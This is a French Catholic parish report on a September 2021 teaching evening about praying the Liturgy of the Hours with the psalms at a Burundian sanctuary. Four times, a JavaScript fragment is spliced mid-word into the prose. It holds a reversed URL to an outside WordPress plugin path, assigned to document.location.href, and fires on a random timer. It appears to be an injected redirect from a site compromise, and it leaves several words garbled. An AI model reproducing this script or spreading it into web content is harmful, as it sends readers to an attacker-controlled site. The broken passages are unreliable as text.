Ce lundi 27 septembre 2021, le Sanctuaire de la Reine de la paix et la réconciliation a organisé, à l’intention du public intéressé, une soirée d’enseignement sur l’utilisation des psaumes lors de nos prières quotidiennes. Cette forme de prière, dénommée La Prière du Temps Présent, utilise exclusivement les psaumes du début à la fin, à part qu’il y a des intervalles de la lecture de la parole de Dieu, des intentions et d’autres formes courtes de prières entre un psaume et un autre. Ledit enseignement a été dispensé par le Père Herménégilde Coyitungiye, actuel Recteur du Sanctuaire. Il s’est servi de la Parole de Dieu tirée de l’épitre de saint Paul apôtre aux Ephésiens (5, 1-20).

Il a commencé à rappeler aux participants que nous sommes vers la fin de l’année liturgique 2020-2021.  C’est dans cette optique que notre Archevêque Gervais BASHIMIYUBUSA a solennellement ouvert l’année liturgique 2021-2022 le 18/9/2021 sous le thème « Construisons l’Eglise-Famille à la Lumière de la Parole de Dieu ». Nous avons eu une occasion de parler à propos de ce thème au cours de la semaine dédiée aux activités du groupe Mukama Menyekana, avec comme vision de recevoir la lumière à travers la lecture et la méditation de la Parole de Dieu dans nos familles. L’enseignement de cette soirée avait été dispensé par l’Abbé Célestin Simbanduku qui nous a fait connaître la valeur ajoutée de prier en utilisant les psaumes dans l’Eglise Catholique. En plus du passage lu pour l’enseignement de ce jour, il y a encore d’autres passages des Saintes Ecritures qui nous invitent à prier avec les psaumes aussi bien lors des moments difficiles comme lors de nos actions de grâces. Nous citerons entre autres le Livre des Actes de Apôtres (3 ,1 ; 10,9 ; 16,25).

Quel est l’intérêt de prier en utilisant les psaumes ?

Les psaumes de l’Eglise Catholiques sont utiles pour rendre les heures saintes, préparer la sainte messe, atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorer Dieu par la louange, préparer les croyants à la rencontre avec Dieu dans le Saint Sacrement et pour prier pour les autres qui ont besoin de notre prière ainsi que pour le monde entier. L’organisation d’une telle prière est prévue pour durer toute la journée, de jour comme de nuit. Cette forme de prière peut être exécutées par tout le monde, individuellement comme en groupe, l’idée étant de se joindre à toute l’Eglise pour louer la bonté divine. Certaines personnes sont libres d’exécuter cette forme de prière, mais il y a d’autres qui ont cette obligation. Ce sont entre autres les consacrés ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés (Evêques, prêtres, diacres et certains membres des communautés religieuses).

Nous récitons les psaumes pour que Dieu bénisse notre journée. L’office du matin se récite avant qu’on fait ou dit autre chose, car il commence avec les mots ‘ Seigneur, ouvre mes lèvres, et ma bouche chantera tes louanges’. L’office du soir commence avec les mots ‘Dieu, viens à mon aide, Seigneur à notre secours’. En récitant les psaumes le matin on loue le seigneur pour nous avoir éveillé et nous lui demantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons de nous assister et nous combler de ses bénédictions pour la journée que nous commençons.

Pour chaque office, nous récitons un hymne, trois psaumes, nous lisons la Parole de Dieu, nous faisons suivre la prière universelle suivie par l’hymne de Zacharie avant de clôturer par le magnificat. Les attitudes que nous atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doptons lors de la récitation de ces psaumes sont : Au commencement, nous on est début jusqu’on ait terminé l’hymne du début. Nous nous asseyons ensuite jusqu’au moment des intentions. Celles-ci se disent quand les priants sont debout. Nous tenons à noter que cet enseignement s’est clôturer par un exercice pratique où les participants ont récité l’office de cette soirée.

NIMBONA Frédéric